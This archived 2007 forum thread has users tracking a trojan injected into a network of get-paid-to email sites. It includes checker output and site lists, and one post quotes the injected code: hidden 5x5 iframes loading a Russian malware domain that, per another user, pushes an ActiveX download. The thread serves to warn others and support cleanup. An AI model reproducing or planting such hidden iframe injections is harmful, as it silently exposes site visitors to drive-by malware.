Help - Search - Members - Calendar
Full Version: Trojans on Genelle's sites (in list)
Get Paid Forum - Get Paid Discussion > Get Paid To Programs > Sites Allegedly with problems of hacking/virus/0-iframes, autosearches etc ... > Sites hit by virusses or hacked
wagdoll
I had a littlecountryplace page with the stelaartois trojan and went to report it to butterflies n roses where as it was in their PTP got hit by it there too on the report page. toybox was reported earlier as having this back again, assume all Genelle's sites have it again, they are usually all hit together and there's too many of them to go run through Jutaky's checker individually.

CODE
(Level: 0) Url checked:
http://littlecountryplace.com
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
http://www.stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified
the lil crusader
It's on Kerosene Cucumber too:

QUOTE(IframeChecker)
No zeroiframes detected!
Check took 4.15 seconds

(Level: 0) Url checked:
http://www.thekerosenecucumber.com
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
http://www.stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
http://www.stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
http://www.stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
http://www.kissdesign.net/calendriers/025/code.js
Blank page / could not connect
sophieca
Does someone have a list of Genelles' sites ?

Is she fixing this ?

Thanks aa.gif
wagdoll
I was also wondering these things Sophie. Last time it happened I did go through her sites with Jutaky's detektor and grabbed site lists from the code. I wrote to her using generic email addresses for several of the sites (support@ and webmaster@) but didn't receive any replies so I have no idea if she even got my messages. I can't visit sites that have this on them to send them a support form, so I have no way to let them know unless an address like that works, and I don't know if the address works unless they reply.

I believe these are amongst Genelle's sites, that she owns or runs or hosts. Apologies for any errors.

hummingbirdsnroses.com
PrancingPenguins
CountryRedneck
SugarLandCash
SweetClickers
CatMails
ButterfliesNRoses
MotherEarthMails
BigDaddyMails
PoolHallPTR
TheToyBoxOnline
purringemail.com
KeroseneCucumber
thelittlestpenguins.com
Foxden
LittleCountryPlace
Pactech hosting
drunkenpenguins

I don't think that is a complete list.

I believe heavenlyemail and destinysdollars are now on pactech hosting and also getting hit when Genelle's get hit recently, although they are not owned by her.
wagdoll
I just checked thetoyboxonline and littlecountryplace and they are both now clean. I have not checked the rest of the sites.
taf
QUOTE(wagdoll @ Feb 6 2007, 04:39 PM) [snapback]4639642[/snapback]
I just checked thetoyboxonline and littlecountryplace and they are both now clean. I have not checked the rest of the sites.


thank you Wagdoll for the warning,
I am happy to say I am only a member at one site of Genelle's - mother earth- which she acquired during the allen fan club transfer, but she seems never to send mails on it, including my gold ads, LOL.
sophieca
Thanks for the list wagdoll, going to check them now, if they are still infected, I'll add them to the alphabetical list otherwhise I'll leave it at that but as they seem to be a regular target, we'll keep an eye on it

hummingbirdsnroses.com fixed - nothing on homepage
PrancingPenguin fixed - nothing on homepage
CountryRedneck fixed - nothing on homepage
SugarLandCash fixed - nothing on homepage
SweetClickers fixed - nothing on homepage
CatMails fixed - nothing on homepage
ButterfliesNRoses fixed - nothing on homepage
MotherEarthMails fixed - nothing on homepage
BigDaddyMails fixed - nothing on homepage
PoolHallPTR fixed - nothing on homepage
TheToyBoxOnline fixed - nothing on homepage
purringemail.com fixed - nothing on homepage
KeroseneCucumber fixed - nothing on homepage
thelittlestpenguins.com fixed - nothing on homepage
Foxden Googled this one but couldn't find which one was the right one
LittleCountryPlace fixed - nothing on homepage
Pactech hosting fixed - nothing on homepage
drunkenpenguins fixed - nothing on homepage

Candyred32
QUOTE(wagdoll @ Feb 5 2007, 06:23 AM) [snapback]4639153[/snapback]
I was also wondering these things Sophie. Last time it happened I did go through her sites with Jutaky's detektor and grabbed site lists from the code. I wrote to her using generic email addresses for several of the sites (support@ and webmaster@) but didn't receive any replies so I have no idea if she even got my messages. I can't visit sites that have this on them to send them a support form, so I have no way to let them know unless an address like that works, and I don't know if the address works unless they reply.

I believe these are amongst Genelle's sites, that she owns or runs or hosts. Apologies for any errors.

hummingbirdsnroses.com
PrancingPenguins
CountryRedneck
SugarLandCash
SweetClickers
CatMails
ButterfliesNRoses
MotherEarthMails
BigDaddyMails
PoolHallPTR
TheToyBoxOnline
purringemail.com
KeroseneCucumber
thelittlestpenguins.com
Foxden
LittleCountryPlace
Pactech hosting
drunkenpenguins

I don't think that is a complete list.

I believe heavenlyemail and destinysdollars are now on pactech hosting and also getting hit when Genelle's get hit recently, although they are not owned by her.


Genelle also owns GroovyPaidEmails.biz
trekkiesg
stellaartois is back...

littlecountryplace.com - infected
thelittlestpenguins.com - infected
thetoyboxonline - infected

had to refresh a few times but the nasty is definitely there.
not sure about the others.

have alerted her about this + alerted her about this thread
anyyan
stelaartois.ru 5x5 iframe freasing browser and download ActiveX still on thelittlestpenguins.

I came across it on Sparky's PTP. Reported to Tipsy.

Not sure of other sites.
cubster
It is definetely still on thetoyboxonline.
sophieca
I had it too on the penguin PTP one, anyone knows the quickest way to inform Genelle ?
trekkiesg
this is the reply I got from them.
So they are aware of the issue and are working on it:


QUOTE
---------- Forwarded message ----------
From: support@thetoyboxonline.com <support@thetoyboxonline.com>
Date: Mar 16, 2007 9:41 PM
Subject: Re: Other

Hi,

We are looking into this. Thank you for alerting us to this situation.


Kathy


Quoting trekkiesg:

>
> name: trekkiesg
>
> username: n/a
>
> bquestion_type: stellaartois on your sites
>
> message_type: hi Genelle,
>
> your sites are infected with the Stellaartois trojan.
>
> you might want to check through them. I did not check all the sites,
> only this one, littlecountryplace, thelittlestpenguins, all of
> which are affected.
>
> There is a thread at Getpaidforum so you can update us there:
> http://getpaidforum.com/forums/index.php?showtopic=478263
OurPTR2
There are now three stellaartois showing on thelittlestpenguins.com.
mcf
QUOTE(wagdoll @ Feb 5 2007, 07:23 AM) [snapback]4639153[/snapback]
I was also wondering these things Sophie. Last time it happened I did go through her sites with Jutaky's detektor and grabbed site lists from the code. I wrote to her using generic email addresses for several of the sites (support@ and webmaster@) but didn't receive any replies so I have no idea if she even got my messages. I can't visit sites that have this on them to send them a support form, so I have no way to let them know unless an address like that works, and I don't know if the address works unless they reply.

I believe these are amongst Genelle's sites, that she owns or runs or hosts. Apologies for any errors.

hummingbirdsnroses.com
PrancingPenguins
CountryRedneck
SugarLandCash
SweetClickers
CatMails
ButterfliesNRoses
MotherEarthMails
BigDaddyMails
PoolHallPTR
TheToyBoxOnline
purringemail.com
KeroseneCucumber
thelittlestpenguins.com
Foxden
LittleCountryPlace
Pactech hosting
drunkenpenguins

I don't think that is a complete list.

I believe heavenlyemail and destinysdollars are now on pactech hosting and also getting hit when Genelle's get hit recently, although they are not owned by her.

How can she manage so many site ? Guess the answer is "not".
Spare-Dollars
QUOTE(trekkiesg @ Mar 15 2007, 08:44 AM) [snapback]4660801[/snapback]
stellaartois is back...

littlecountryplace.com - infected
thelittlestpenguins.com - infected
thetoyboxonline - infected

had to refresh a few times but the nasty is definitely there.
not sure about the others.

have alerted her about this + alerted her about this thread



Looks like littlecountryplace.com is clean but now pactech-hosting.com is infected.

QUOTE
(Level: 0) Url checked:
http://www.pactech-hosting.com
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
http://www.stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified


cconniejean
QUOTE
No zeroiframes detected!
Check took 3.33 seconds

(Level: 0) Url checked:
htt://bigdaddymails.com/pages/index.php?refid=
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
htt://stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
htt://stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
htt://stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
htt://adreporting.com/rotate/rotate.php?aid=685290&rid=4
Zeroiframes detected on this site: 0
No ad codes identified
wagdoll
Prancing penguin also infected. Sent contact form.

CODE
<IFRAME name="StatPage" src="http://stelaartois.ru/index2.php" width=5 height=5 style="display:none"></IFRAME><table width="100%" border="0" cellspacing="5" cellpadding="5" align="CENTER">

<a href=http://www.prancingpenguin.com/pages/ <IFRAME name="StatPage" src="http://stelaartois.ru/index2.php" width=5 height=5 style="display:none"></IFRAME>

<IFRAME name="StatPage" src="http://stelaartois.ru/index2.php" width=5 height=5 style="display:none"></IFRAME>


XostedMomof3
HI All-

Ok, Billi Here ;-) I have been hit by this nasty too so my sites are in suspended mode right now until I can clean this out or until my host can. We are both working at this, but it seems they are coming back as soon as we clean them so does anyone know how to block this guy? I mean anyone with any ideas how to stop these from being inserted PLEASE PM me lol. I would greatly appreciate the help. Thanks so much!!

Billi

Ami's House
AIM Paid 2 Read
Medieval Mails
Lillyth's Magick Mails
XostedMom's Place
wagdoll
Are you aware that the suspended page also has the trojan on it? I also read that due to this suspended hosting page redirect, that any sites that have banners up for the affected sites are also infected with the trojan. Is there any chance they can be taken offline totally until the suspended page is cleaned - too many people are not protected or even being informed about this trojan.

There's some advice on this site for cleaning it from the server

http://help.lockergnome.com/security/Javas...opict10748.html

Also everyone who has cpanel access needs to scan their own computers and make sure they are clean before going back in there. You could try adding the stelaartois domain to your hosts file on the PC and for the server/cpanel (I don't know the terminology for server stuff), and if you all stay out of the cpanels you might be able to see the IP that the stuff is coming from if it is from an external source rather than staying in the system and just self-reinfecting. Self reinfecting sounds most likely unless there is a cpanel vulnerability that is being hit over and over. If it is coming from an outside IP then that should be blocked at the server level. Also make sure there's no 777 permissions being left open.

I apologise if this is no good, but as I say I don't know anything about servers ah.gif

sophieca
Good luck to you XostedMomof3 !


And here we go again littlecountryplace has now 6 of them !
CODE
No zeroiframes detected!
Check took 3.89 seconds

(Level: 0) Url checked:
http://www.littlecountryplace.com/pages/index.php?refid=
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
http://stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
http://stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
http://stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
http://stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
http://stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
http://stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified
XostedMomof3
Thanks for the info hun, I have passed it on. Hopefully we will get somewhere with this. IT IS SO FRUSTRATING!!!
gen328
That link goes to a 404 not found..
sophieca
It brings me to a forum, maybe if I repost it :
link

Good luck
wagdoll
http://getpaidforum.com/forums/index.php?showtopic=482717

New hack on one of Genelle's sites. It has a new domain, not stelaartois this time ah.gif
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2012 Invision Power Services, Inc.